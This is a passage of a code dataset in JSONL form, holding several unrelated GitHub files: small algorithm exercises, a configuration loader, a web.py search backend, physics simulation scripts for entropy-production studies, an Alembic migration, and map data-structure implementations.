linestyle\n self.marker = marker\n self.color = color\n self.legend = legend\n self.markevery = markevery\n self.alpha = alpha\n self.hatch = hatch\n self.dashes = dashes\n\n\ndef get_sub_sheet(sheet, row_begin, row_end, col_begin, col_end):\n rows = []\n for i in range(row_begin, row_end):\n rows.append(sheet.row_values(i, col_begin, col_end))\n return rows\n\n\nworkbook = xlrd.open_workbook(\"/Users/luochen/Documents/Research/experiments/results/rebalance/result.xlsx\")\n\nxlabel_nodes = \"Number of Nodes\"\nylabel_time = \"Time (Minutes)\"\nylabel_time_sec = \"Time 
(Seconds)\"\n","repo_name":"luochen01/storage-experiments","sub_path":"storage-experiments/src/edu/uci/asterixdb/storage/experiments/scripts/rebalance/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31080903725","text":"\"\"\"\nGiven a string, your task is to replace each of its characters\nby the next one in the English alphabet; i.e. replace a with b,\nreplace b with c, etc (z would be replaced by a).\n\"\"\"\n\ndef alphabetic_shift(input_string):\n new_string = \"\"\n for char in input_string:\n # convert char to ascii code equivalent using ord\n # increment the ascii_code by 1 and wrap around 'a' if it is 'z'\n # The % 26 is used to ensure that the shift remains within \n # the 26 letters of the lowercase alphabet. ord('a') is added \n # back to the result to obtain the new ASCII code of the shifted letter.\n new_ascii_code = (ord(char) - ord('a') + 1) % 26 + ord('a')\n # convert back to char and append to new_string\n new_string += chr(new_ascii_code)\n\n return new_string\n\n# Test Data\nprint(alphabetic_shift(\"crazy\"))\n","repo_name":"Levy-Naibei/algorithm-challenges","sub_path":"codesignal/alphabet_shift.py","file_name":"alphabet_shift.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71484969068","text":"import os\nimport logging\nfrom chibi.atlas import Chibi_atlas, Chibi_atlas_default\nfrom chibi.file import Chibi_path\nfrom chibi.file.other import Chibi_json, Chibi_yaml, Chibi_python\nimport chibi_donkey as donkey\n\n\nlogger = logging.getLogger( 'chibi.config.Configuration' )\n\n\n__all__ = [ 'Configuration' ]\n\n\ndef _default_factory():\n return Configuration()\n\n\nclass Configuration( Chibi_atlas_default ):\n def __init__( self, default_factory=None, *args, **kw ):\n if default_factory is None:\n default_factory = _default_factory\n super().__init__( default_factory, *args, **kw )\n\n def load( self, path ):\n path = Chibi_path( path )\n with path as f:\n if isinstance( f, ( Chibi_json, Chibi_yaml ) ):\n for k, v in f.read().items():\n self[ k ] = v\n elif isinstance( f, Chibi_python ):\n logger.info( f\"ejecutanto archivo python {f}\" )\n f.import_()\n else:\n raise NotImplementedError(\n \"no esta implementado la carga de configuracion de los \"\n f\"archivos {type(f)} de {f}\" )\n\n\nclass Logger_configuration( Chibi_atlas ):\n def __getitem__( self, name ):\n try:\n return super().__getitem__( name )\n except KeyError:\n # logger = logging.getLogger( name )\n self[ name ] = Logger( name=name )\n return super().__getitem__( name )\n\n\nclass Logger( Chibi_atlas ):\n @property\n def level( self ):\n logger = self.logger\n while logger:\n if logger.level != logging.NOTSET:\n return logger.level\n logger = logger.parent\n return self.logger.level\n\n @level.setter\n def level( self, value ):\n if isinstance( value, str ):\n level = getattr( logging, value )\n if isinstance( level, int ):\n self.logger.setLevel( level )\n else:\n raise NotImplementedError(\n f\"no esta implementado la asignacion del level de {value}\"\n )\n elif isinstance( value, int ):\n self.logger.setLevel( value )\n else:\n raise NotImplementedError(\n f\"no esta implementado la asignacion del level de {value}\" )\n\n @property\n def logger( self ):\n return logging.getLogger( self.name )\n\n\nclass Env_vars( Configuration ):\n def __init__( self, 
\n","repo_name":"Levy-Naibei/algorithm-challenges","sub_path":"codesignal/alphabet_shift.py","file_name":"alphabet_shift.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71484969068","text":"import os\nimport logging\nfrom chibi.atlas import Chibi_atlas, Chibi_atlas_default\nfrom chibi.file import Chibi_path\nfrom chibi.file.other import Chibi_json, Chibi_yaml, Chibi_python\nimport chibi_donkey as donkey\n\n\nlogger = logging.getLogger( 'chibi.config.Configuration' )\n\n\n__all__ = [ 'Configuration' ]\n\n\ndef _default_factory():\n    return Configuration()\n\n\nclass Configuration( Chibi_atlas_default ):\n    def __init__( self, default_factory=None, *args, **kw ):\n        if default_factory is None:\n            default_factory = _default_factory\n        super().__init__( default_factory, *args, **kw )\n\n    def load( self, path ):\n        path = Chibi_path( path )\n        with path as f:\n            if isinstance( f, ( Chibi_json, Chibi_yaml ) ):\n                for k, v in f.read().items():\n                    self[ k ] = v\n            elif isinstance( f, Chibi_python ):\n                logger.info( f\"executing python file {f}\" )\n                f.import_()\n            else:\n                raise NotImplementedError(\n                    \"loading configuration from files \"\n                    f\"of type {type(f)} ({f}) is not implemented\" )\n\n\nclass Logger_configuration( Chibi_atlas ):\n    def __getitem__( self, name ):\n        try:\n            return super().__getitem__( name )\n        except KeyError:\n            # logger = logging.getLogger( name )\n            self[ name ] = Logger( name=name )\n            return super().__getitem__( name )\n\n\nclass Logger( Chibi_atlas ):\n    @property\n    def level( self ):\n        logger = self.logger\n        while logger:\n            if logger.level != logging.NOTSET:\n                return logger.level\n            logger = logger.parent\n        return self.logger.level\n\n    @level.setter\n    def level( self, value ):\n        if isinstance( value, str ):\n            level = getattr( logging, value )\n            if isinstance( level, int ):\n                self.logger.setLevel( level )\n            else:\n                raise NotImplementedError(\n                    f\"assigning the level from {value} is not implemented\"\n                )\n        elif isinstance( value, int ):\n            self.logger.setLevel( value )\n        else:\n            raise NotImplementedError(\n                f\"assigning the level from {value} is not implemented\" )\n\n    @property\n    def logger( self ):\n        return logging.getLogger( self.name )\n\n\nclass Env_vars( Configuration ):\n    def __init__( self, default_factory=None, *args, **kw ):\n        if default_factory is None:\n            default_factory = str\n        d = donkey.inflate( os.environ )\n        super().__init__( default_factory, d, *args, **kw )\n","repo_name":"dem4ply/chibi","sub_path":"chibi/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35433953187","text":"curr = 0\npoints = {\n    \"X\": 1,\n    \"Y\": 2,\n    \"Z\": 3,\n    \"A\": 1,\n    \"B\": 2,\n    \"C\": 3\n}\n# winning_comb = [\"CX\", \"BZ\", \"AY\"]\nwinning_comb = {\n    \"C\": \"X\",\n    \"B\": \"Z\",\n    \"A\": \"Y\"\n}\n# eq = [\"AX\", \"BY\", \"CZ\"]\nloosing_comb = {\n    \"A\": \"Z\",\n    \"B\": \"X\",\n    \"C\": \"Y\"\n}\nwhile True:\n    try:\n        a = input().split()\n        if a[1] == \"Y\":\n            curr += points[a[0]] + 3\n        else:\n            if a[1] == \"Z\":\n                curr += points[winning_comb[a[0]]] + 6\n            else:\n                curr += points[loosing_comb[a[0]]]\n    except EOFError:\n        break\n\nprint(curr)\n","repo_name":"mclarammd/aoc","sub_path":"aoc-2_1.py","file_name":"aoc-2_1.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38572007814","text":"# -*- coding: utf-8 -*-\n__author__ = 'jsz'\n__version__ = 0.1\n\n\nimport web\nimport json\n\nfrom search_engine import SearchService\nfrom search_engine import FacetEncoder\nfrom models import BookEncoder\n\n# APIs exposed to front end\nurls = (\n    \"/keyWordsSearch\",\"KeyWordsSearch\",\n    \"/facetSearch\",\"FacetSearch\",\n    \"/expandSearch\",\"ExpandSearch\",\n    \"/defineSearch\",\"DefineSearch\",\n    \"/historySummary\",\"HistorySummary\",\n    \"/(.*)\", \"Index\"\n    )\n\n\napp = web.application(urls, globals())\n\n\nclass Index:\n\n    def GET(self, url):\n        u\"\"\"\n        :param url: required, or an exception is raised\n        \"\"\"\n        raise web.redirect('/static/web-angular/app/index.html')\n\n\ndef json_encoder(search_result):\n    result = {\n        'facets': json.loads(json.dumps(search_result.facets, cls=FacetEncoder)),\n        'content': json.loads(json.dumps(search_result.content, cls=BookEncoder))\n    }\n    return json.dumps(result)\n\n\nclass KeyWordsSearch:\n\n    def GET(self):\n        u\"\"\"\n        Backend endpoint for keyword search\n        :param key_words: String - keywords passed from the front end\n        :return: SearchResult - result set of the keyword search\n        \"\"\"\n        \n        key_words_str = web.input()['key_words']\n        key_words = key_words_str.split()\n        \n        ip = web.ctx.ip\n        service = SearchService.get_service_by_ip(ip)\n        search_result = service.key_words_search(key_words)\n        return json_encoder(search_result)\n\nclass FacetSearch:\n\n    def GET(self):\n        u\"\"\"\n        Faceted search endpoint\n        :param new_attr: int - newly added facet attribute\n        :return SearchResult - result set of the faceted search\n        \"\"\"\n        new_attr = int(web.input()['new_attr'])\n\n        ip = web.ctx.ip\n        service = SearchService.get_service_by_ip(ip)\n        search_result = service.facet_search(new_attr)\n        return json_encoder(search_result)\n\nclass ExpandSearch:\n\n    def GET(self):\n        u\"\"\"\n        Generalize from the current query node\n        :param degree: float - degree of generalization, between 0 and 1\n        :return: SearchResult - result set of the generalized search\n        \"\"\"\n        return \"ExpandSearch\"\n\n\nclass DefineSearch:\n\n    def GET(self):\n        u\"\"\"\n        Refine from the current query node\n        :param degree: float - degree of refinement, between 0 and 1\n        :return: SearchResult - result set of the refined search\n        \"\"\"\n        return \"DefineSearch\"\n\n\nclass HistorySummary:\n\n    def GET(self):\n        u\"\"\"\n        Recommend results based on the query history\n        :return: SearchResult - recommended result set from history\n        \"\"\"\n        return \"HistorySummary\"\n    \n    \nif __name__ == '__main__':\n    
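# Example requests once the server is running (illustrative values, not part\n    # of the original file):\n    #   GET /keyWordsSearch?key_words=concept+lattice\n    #   GET /facetSearch?new_attr=3\n    # Both implemented endpoints reply with the JSON built by json_encoder().\n    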
app.run()\n","repo_name":"zeal4u/FCA_Faceted_Search","sub_path":"bin/web_backend.py","file_name":"web_backend.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2320655747","text":"\nfrom pulse_lib.tests.configurations.test_configuration import context\nimport pulse_lib.segments.utility.looping as lp\n\ndef test():\n pulse = context.init_pulselib(n_gates=2)\n\n n_pulses = lp.array([1,2,4,9], axis=0, name='n_pulses')\n\n s = pulse.mk_segment()\n\n context.segment = s\n\n s.P1.update_dim(n_pulses)\n for i,n in enumerate(n_pulses):\n p1 = s.P1[i]\n for _ in range(int(n)):\n p1.add_ramp_ss(0, 100, -80, 80)\n p1.reset_time()\n\n s.P2.add_block(0, 100, 60)\n\n for i in range(len(n_pulses)):\n context.plot_segments([s], index=[i])\n\n sequence = pulse.mk_sequence([s])\n context.add_hw_schedule(sequence)\n for n in sequence.n_pulses.values:\n sequence.n_pulses(n)\n context.plot_awgs(sequence, ylim=(-0.100,0.100))\n\n return None\n\nif __name__ == '__main__':\n ds = test()\n","repo_name":"stephanlphilips/pulse_lib","sub_path":"pulse_lib/tests/looping/test_segment_update_dim.py","file_name":"test_segment_update_dim.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11408979524","text":"import numpy as np\nimport torch, csv\n\n\ndef bead_spring(data_id, n_sample, dim=2, dt=10**(-3), T_ratio=0.1, m_error=0, rand_seed=0):\n np.random.seed(rand_seed)\n k = 1\n g = 1\n Th = 250\n Tc = Th*T_ratio\n A = np.identity(dim) * (-2*k/g)\n D = np.zeros((dim, dim))\n for i in range(dim):\n if(i+1 < dim):\n A[i, i+1] += k/g\n if(i-1 >= 0):\n A[i, i-1] += k/g\n D[i, i] = Th/g - (Th-Tc)/g/(dim-1)*i\n x0 = np.zeros(dim)\n x = np.zeros((n_sample+1, dim))\n obs = np.zeros((n_sample+1, dim))\n\n # Relaxation\n for i in range(100000):\n x0 = x0 + dt*np.matmul(x0, A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt))\n x[0, :] = x0\n obs[0, :] = x0 + np.random.normal(0,1,dim)*m_error\n\n # Generate trajectory data\n for i in range(n_sample):\n x[i+1,:] = x[i,:] + dt*np.matmul(x[i,:], A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt))\n obs[i+1,:] = x[i+1,:] + np.random.normal(0,1,dim)*m_error # Add measurement error\n np.savetxt('Data/data' + str(data_id) + '.txt', obs)\n\n # Calculate the true entropy production rate\n cov = np.identity(dim)\n for i in range(100000):\n cov += (np.matmul(A, cov) + np.matmul(cov, A.T) + 2*D)*dt\n true_value = np.trace(np.einsum('ij,jk,kl,lm->im', A, np.linalg.inv(D), A, cov)\n - np.einsum('ij,jk->ik', np.linalg.inv(cov), D))\n print('True entropy production rate : ' + '{:.4f}'.format(true_value))\n\n\ndef Mexican_hat(data_id, n_sample, dt=10**(-4), nonlinear=100, m_error=0, rand_seed=0):\n np.random.seed(rand_seed)\n dim = 2\n k = 1\n g = 1\n Th = 250\n Tc = 25\n A = np.identity(dim) * (-2*k/g)\n D = np.zeros((dim, dim))\n for i in range(dim):\n if(i+1 < dim):\n A[i, i+1] += k/g\n if(i-1 >= 0):\n A[i, i-1] += k/g\n D[i, i] = Th/g - (Th-Tc)/g/(dim-1)*i\n x0 = np.zeros(dim)\n x = np.zeros((n_sample+1, dim))\n obs = np.zeros((n_sample+1, dim))\n\n # Relaxation\n for i in range(100000):\n x0 = (x0 + dt*np.matmul(x0, A)\n - dt*nonlinear*(4*np.sum(x0**2)-2)*x0 + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt)))\n x[0, :] = x0 \n obs[0, :] = x0 + np.random.normal(0,1,dim)*m_error\n\n # Generate trajectory data\n for i in range(n_sample):\n x[i+1,:] = (x[i,:] + 
dt*np.matmul(x[i,:], A)\n              - dt*nonlinear*(4*np.sum(x[i,:]**2)-2)*x[i,:] + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D*dt)))\n        obs[i+1,:] = x[i+1,:] + np.random.normal(0,1,dim)*m_error # Add measurement error\n    np.savetxt('Data/data' + str(data_id) + '.txt', obs)\n\n\ndef breathing_parabola(data_id, n_traj, n_sample, dt=10**(-2), m_error=0, t_error=0, rand_seed=0):\n    np.random.seed(rand_seed)\n    dim = 1\n    time_shift = 0\n    x0 = np.zeros(dim)\n    x0_tmp = np.zeros(dim)\n    x = np.zeros((n_sample+1, dim))\n    obs = np.zeros((n_sample+1, dim+1))\n    output_file = open('Data/data' + str(data_id) + '.txt', 'w')\n    output_writer = csv.writer(output_file, delimiter=' ')\n\n    # Relaxation\n    for i in range(10000):\n        x0 = x0 - dt*x0 + np.random.normal(0,1,dim) * np.sqrt(2*dt) \n    \n    # Generate trajectory data\n    for i in range(n_traj):\n        # Relaxation\n        for j in range(100):\n            x0 = x0 - dt*x0 + np.random.normal(0,1,dim) * np.sqrt(2*dt)\n        x0_tmp[:] = x0\n\n        # Synchronization error\n        if t_error > 0:\n            time_shift = int(np.floor(np.random.uniform(0,1)*t_error/dt))  # integer number of steps for range()\n            for j in range(time_shift):\n                x0_tmp = x0_tmp - dt*x0_tmp/(1+j*dt) + np.random.normal(0,1,dim) * np.sqrt(2*dt)\n        \n        x[0,:] = x0_tmp\n        obs[0,0], obs[0,1:] = 0, x0_tmp + np.random.normal(0,1,dim)*m_error\n        for j in range(n_sample):\n            x[j+1,:] = x[j,:] - dt*x[j,:]/(1+(j+time_shift)*dt) + np.random.normal(0,1,dim) * np.sqrt(2*dt)\n            obs[j+1,0], obs[j+1,1:] = (j+1)*dt, x[j+1,:] + np.random.normal(0,1,dim) * m_error\n\n        # Write to the output file \n        output_writer.writerows(obs)\n    \n\ndef adaptation(data_id, n_traj, n_sample, dt=10**(-5), m_error=0, t_error=0, rand_seed=0):\n    np.random.seed(rand_seed)\n    dim = 2\n    tau_a = 0.02\n    tau_m = 0.2\n    alpha = 2.7\n    A = np.array([[-1/tau_a, (1/tau_a) * alpha],\n                  [-1/tau_m, 0]]).transpose()\n    Tm = 0.005\n    Ta0 = 0.005\n    D0 = np.array([[Ta0, 0],\n                   [0, Tm]])\n    Ta1 = 0.5\n    D1 = np.array([[Ta1, 0],\n                   [0, Tm]])\n    lt = 0.01\n    L = np.array([-lt*dt/tau_a, 0])\n    \n    x0 = np.zeros(dim)\n    x0_tmp = np.zeros(dim)\n    time_shift = 0  # no shift unless t_error > 0 below\n    x = np.zeros((n_sample+1, dim))\n    obs = np.zeros((n_sample+1, dim+1))\n    output_file = open('Data/data' + str(data_id) + '.txt', 'w')\n    output_writer = csv.writer(output_file, delimiter=' ')\n\n    # Relaxation\n    for i in range(100000):\n        x0 = x0 + dt*np.matmul(x0, A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D0*dt))\n\n    # Generate trajectory data\n    for i in range(n_traj):\n        # Relaxation\n        for j in range(1000):\n            x0 = x0 + dt*np.matmul(x0, A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D0*dt))\n        x0_tmp[:] = x0\n        \n        # Synchronization error\n        if t_error > 0:\n            time_shift = int(np.floor(np.random.uniform(0, 1)*t_error/dt))  # integer number of steps for range()\n            for j in range(time_shift):\n                x0_tmp = x0_tmp + dt*np.matmul(x0_tmp, A) + L + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D1*dt))\n        \n        x[0,:] = x0_tmp\n        obs[0,0], obs[0,1:] = 0, x0_tmp + np.random.normal(0,1,dim)*m_error\n        for j in range(n_sample):\n            x[j+1,:] = x[j,:] + dt*np.matmul(x[j,:], A) + L + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D1*dt))\n            obs[j+1,0], obs[j+1,1:] = (j+1)*dt, x[j+1,:] + np.random.normal(0,1,dim)*m_error\n\n        # Write to the output file\n        output_writer.writerows(obs)\n\n\ndef epr_breathing_parabola(t):\n    return (t**2 * (3 + 3*t + t**2)**2)/(3 * (1+t)**4 * (3 + 6*t + 6*t**2 + 2*t**3))\n\n    \ndef epr_adaptation(t):\n    return ((np.exp(-50*t) * (-63998940689442 + 6243520070815830*np.exp(50*t) - 171111379578637905*np.exp(100*t)\n             + 24029699524871040*np.exp(150*t) - 1441667880822810*np.exp(200*t)\n             + 44383810651556*np.exp(250*t) - 400*np.exp(25*t)\n             * (192119202 - 
13163076234*np.exp(50*t) + 276431059773*np.exp(100*t)\n - 34658515386*np.exp(150*t) + 842869282*np.exp(200*t))*np.cos(5*np.sqrt(2)*t)\n + 12.5*(4432189990140 - 625426775264016*np.exp(50*t) + 19698898382037369*np.exp(100*t)\n -2423603367706752*np.exp(150*t) + 102783600112652*np.exp(200*t))*np.cos(10*np.sqrt(2)*t)\n - 4715653140000*np.exp(75*t)*np.cos(15*np.sqrt(2)*t) + 151830378315000*np.exp(125*t)*np.cos(15*np.sqrt(2)*t)\n - 12837027060000*np.exp(175*t)*np.cos(15*np.sqrt(2)*t) + 1638224935503750*np.exp(50*t)*np.cos(20*np.sqrt(2)*t)\n - 87205888691521875*np.exp(100*t)*np.cos(20*np.sqrt(2)*t) + 6501171027285000*np.exp(150*t)*np.cos(20*np.sqrt(2)*t)\n - 42571868625000*np.exp(125*t)*np.cos(25*np.sqrt(2)*t) + 23805931750734375/2.*np.exp(100*t)*np.cos(30*np.sqrt(2)*t)\n + 845324488800*np.sqrt(2)*np.exp(25*t)*np.sin(5*np.sqrt(2)*t) - 20580429909600*np.sqrt(2)*np.exp(75*t)*np.sin(5*np.sqrt(2)*t)\n + 521418308281200*np.sqrt(2)*np.exp(125*t)*np.sin(5*np.sqrt(2)*t) - 66720192818400*np.sqrt(2)*np.exp(175*t)*np.sin(5*np.sqrt(2)*t)\n + 2381271640800*np.sqrt(2)*np.exp(225*t)*np.sin(5*np.sqrt(2)*t) + 16356068262270*np.sqrt(2)*np.sin(10*np.sqrt(2)*t)\n - 1456450488965340*np.sqrt(2)*np.exp(50*t)*np.sin(10*np.sqrt(2)*t)\n + 74369430767428335/np.sqrt(2)*np.exp(100*t)*np.sin(10*np.sqrt(2)*t)\n - 4249583374522860*np.sqrt(2)*np.exp(150*t)*np.sin(10*np.sqrt(2)*t)\n + 156745750241070*np.sqrt(2)*np.exp(200*t)*np.sin(10*np.sqrt(2)*t)\n + 4715653140000*np.sqrt(2)*np.exp(75*t)*np.sin(15*np.sqrt(2)*t)\n - 224367579315000*np.sqrt(2)*np.exp(125*t)*np.sin(15*np.sqrt(2)*t)\n + 18393897060000*np.sqrt(2)*np.exp(175*t)*np.sin(15*np.sqrt(2)*t)\n + 647934380057250*np.sqrt(2)*np.exp(50*t)*np.sin(20*np.sqrt(2)*t)\n - 27461903641202250*np.sqrt(2)*np.exp(100*t)*np.sin(20*np.sqrt(2)*t)\n + 1894339815860250*np.sqrt(2)*np.exp(150*t)*np.sin(20*np.sqrt(2)*t)\n + 33640707375000*np.sqrt(2)*np.exp(125*t)*np.sin(25*np.sqrt(2)*t)\n + 12131083093696875/np.sqrt(2)*np.exp(100*t)*np.sin(30*np.sqrt(2)*t)))\n / (800 * (9801 - 339471*np.exp(50*t) + 26129*np.exp(100*t) + 304425*np.exp(50*t)*np.cos(10*np.sqrt(2)*t)\n + 24750*np.sqrt(2)*np.exp(50*t)*np.sin(10*np.sqrt(2)*t))**2))\n\n","repo_name":"tsuboshun/LearnEntropy","sub_path":"toy.py","file_name":"toy.py","file_ext":"py","file_size_in_byte":9217,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"70595127468","text":"\"\"\"empty message\n\nRevision ID: 09881542d9ee\nRevises: 136d98670f2c\nCreate Date: 2018-02-27 12:09:01.908597\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '09881542d9ee'\ndown_revision = '136d98670f2c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('training',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('bot_guid', sa.String(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('trained_at', sa.DateTime(), nullable=True),\n sa.Column('train_time', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['bot_guid'], ['bots.bot_guid'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_table('training')\n    # ### end Alembic commands ###\n","repo_name":"GanadiniAkshay/Nacer-NLP","sub_path":"migrations/versions/09881542d9ee_.py","file_name":"09881542d9ee_.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9705230303","text":"from collections.abc import MutableMapping\nfrom random import randrange\n\nclass MapBase(MutableMapping):\n    \"\"\"Abstract Map base class that includes a nonpublic _Item class.\"\"\"\n\n    class _Item:\n        \"\"\"Lightweight composite to store key-value pairs as map items.\"\"\"\n        __slots__ = \"_key\", \"_value\"\n\n        def __init__(self, k, v):\n            self._key = k\n            self._value = v\n\n        def __eq__(self, rhs):\n            return self._key == rhs._key\n\n        def __ne__(self, rhs):\n            return not (self == rhs)\n\n        def __lt__(self, rhs):\n            return self._key < rhs._key\n\nclass UnsortedTableMap(MapBase):\n    \"\"\"Inefficient Map implementation using an unordered list.\"\"\"\n\n    def __init__(self):\n        \"\"\"Create an empty map.\"\"\"\n        self._table = []\n\n    def __getitem__(self, k): # O(n)\n        \"\"\"Return value associated with key k (raise KeyError if not\n        found).\"\"\"\n        for item in self._table:\n            if k == item._key:\n                return item._value\n        raise KeyError(\"Key Error: \" + repr(k))\n\n    def __setitem__(self, k, v): # O(n)\n        \"\"\"Assign value v to key k, overwriting existing value if present.\"\"\"\n        for item in self._table:\n            if k == item._key:\n                item._value = v\n                return\n        self._table.append(self._Item(k, v))\n\n    def __delitem__(self, k): # O(n)\n        \"\"\"Remove item associated with key k (raise KeyError if not found).\"\"\"\n        for j in range(len(self._table)):\n            if k == self._table[j]._key:\n                self._table.pop(j)\n                return\n        raise KeyError(\"Key Error: \" + repr(k))\n\n    def __len__(self):\n        \"\"\"Return number of items in the map.\"\"\"\n        return len(self._table)\n\n    def __iter__(self):\n        \"\"\"Generate iteration of the map's keys.\"\"\"\n        for item in self._table:\n            yield item._key\n\ndef hash_code(s):\n    \"\"\"Return cyclic-shift hash code for string s.\"\"\"\n    mask = (1<<32) - 1\n    h = 0\n    for character in s:\n        h = (h << 5 & mask) | (h >> 27)\n        h += ord(character)\n    return h\n\nclass HashMapBase(MapBase):\n    \"\"\"Abstract base class for map using hash-table with MAD (Multiply, Add\n    and Divide) compression.\"\"\"\n\n    def __init__(self, cap=11, p=109345121):\n        self._table = cap * [None]\n        self._n = 0 # number of entries in the map\n        self._prime = p # prime for MAD compression\n        self._scale = 1 + randrange(p-1) # scale from 1 to p-1 for MAD\n        self._shift = randrange(p) # shift from 0 to p-1 for MAD\n\n    def _hash_function(self, k):\n        return (hash(k) * self._scale + self._shift)\\\n               % self._prime % len(self._table)\n
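\n    # How the MAD compression above spreads keys (worked example with made-up\n    # numbers, not from the original text): with prime p = 109345121, scale\n    # a = 3, shift b = 5 and N = 11 buckets, a key whose hash code is 42 lands\n    # in ((3*42 + 5) % 109345121) % 11 = 131 % 11 = bucket 10. Randomizing a\n    # and b per map instance keeps collision patterns independent of the keys.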
resolution.\"\"\"\n\n def _bucket_getitem(self, j, k):\n bucket = self._table[j]\n if bucket is None:\n raise KeyError(\"Key Error: \" + repr(k))\n return bucket[k] # may raise KeyError\n\n def _bucket_setitem(self, j, k, v):\n if self._table[j] is None:\n self._table[j] = UnsortedTableMap()\n oldsize = len(self._table[j])\n self._table[j][k] = v\n if len(self._table[j]) > oldsize:\n self._n += 1\n\n def _bucket_delitem(self, j, k):\n bucket = self._table[j]\n if bucket is None:\n raise KeyError(\"Key Error: \" + repr(k))\n del bucket[k]\n\n def __iter__(self):\n for bucket in self._table:\n if bucket is not None:\n for key in bucket:\n yield key\n\nclass ProbeHashMap(HashMapBase):\n \"\"\"Hash map implemented with linear probing ofor collision resolution.\"\"\"\n _AVAIL = object() # sentinal marks locations of previous deletions\n\n def _is_available(self, j):\n \"\"\"Return True if index j is available in table.\"\"\"\n return self._table[j] is None or self._table[j] is ProbeHashMap._AVAIL\n\n def _find_slot(self, j, k):\n \"\"\"Search for k in bucket at index j.\n\n Return (success, index) tuple, described as follows:\n If match was found, success is True and index denotes its location.\n If no match found, success is False and index denotes first available\n slot.\n \"\"\"\n firstAvail = None\n for _ in range(len(self._table)):\n if self._is_available(j):\n if firstAvail is None:\n firstAvail = j\n if self._table[j] is None:\n return (False, firstAvail)\n elif k == self._table[j]._key:\n return (True, j)\n j = (j + 1) % (len(self._table))\n return (False, firstAvail)\n\n def _bucket_getitem(self, j, k):\n found, s = self._find_slot(j, k)\n if not found:\n raise KeyError(\"Key Error: \" + repr(k)) # No match found\n return self._table[s]._value\n\n def _bucket_setitem(self, j, k, v):\n found, s = self._find_slot(j, k)\n if not found:\n self._table[s] = self._Item(k, v)\n self._n += 1\n else:\n self._table[s]._value = v\n\n def _bucket_delitem(self, j, k):\n found, s = self._find_slot(j, k)\n if not found:\n raise KeyError(\"Key Error: \" + repr(k)) # No match found\n self._table[s] = ProbeHashMap._AVAIL # mark as vacated\n\n def __iter__(self):\n for j in range(len(self._table)):\n if not self._is_available(j):\n yield self._table[j]._key\n\nclass SortedTableMap(MapBase):\n \"\"\"Map implementation using a sorted table.\"\"\"\n\n # ---- non-public behaviors ----\n def _find_index(self, k, low, high):\n \"\"\"Return index of the leftmost item with key >= k.\n\n Return high + 1 if no such item qualifies.\n\n That is, j will be returned such that:\n all items of slice table[low, j] have key < k\n all items of slice table[j, high+1] have key >= k.\n \"\"\"\n if high < low:\n return high + 1\n else:\n mid = (low + high) // 2\n if k == self._table[mid]._key:\n return mid\n elif k < self._table[mid]._key:\n return self._find_index(k, low, mid - 1)\n else:\n return self._find_index(k, mid + 1, high)\n\n # ---- public behaviors ----\n def __init__(self):\n \"\"\"Create an empty map.\"\"\"\n self._table = []\n\n def __len__(self):\n \"\"\"Return number of items in the map.\"\"\"\n return len(self._table)\n\n def __getitem__(self, k):\n \"\"\"Return value associated with key k (raise KeyError if not\n found).\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j == len(self._table) or self._table[j]._key != k:\n raise KeyError(\"Key Error: \" + repr(k))\n return self._table[j]._value\n\n def __setitem__(self, k, v):\n \"\"\"Assign value v to key k, overwriting existing value if 
present.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j < len(self._table) and self._table[j]._key == k:\n self._table[j]._value = v\n else:\n self._table.insert(j, self._Item(k, v)) # add new item\n\n def __delitem__(self, k):\n \"\"\"Remove item associated with key k (raise KeyError if not found).\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j == len(self._table) or self._table[j]._key != k:\n raise KeyError(\"Key Error: \" + repr(k))\n self._table.pop(j)\n\n def __iter__(self):\n \"\"\"Generate keys of the map ordered from minimum to maximum.\"\"\"\n for item in self._table:\n yield item._key\n\n def __reversed__(self):\n \"\"\"Generate keys of the map ordered from maximum to minimum.\"\"\"\n for item in reversed(self._table):\n yield item._key\n\n def find_min(self):\n \"\"\"Return (k, v) pair with minimum key (or None if empty).\"\"\"\n if len(self._table) > 0:\n return (self._table[0]._key, self._table[0]._value)\n else:\n return None\n\n def 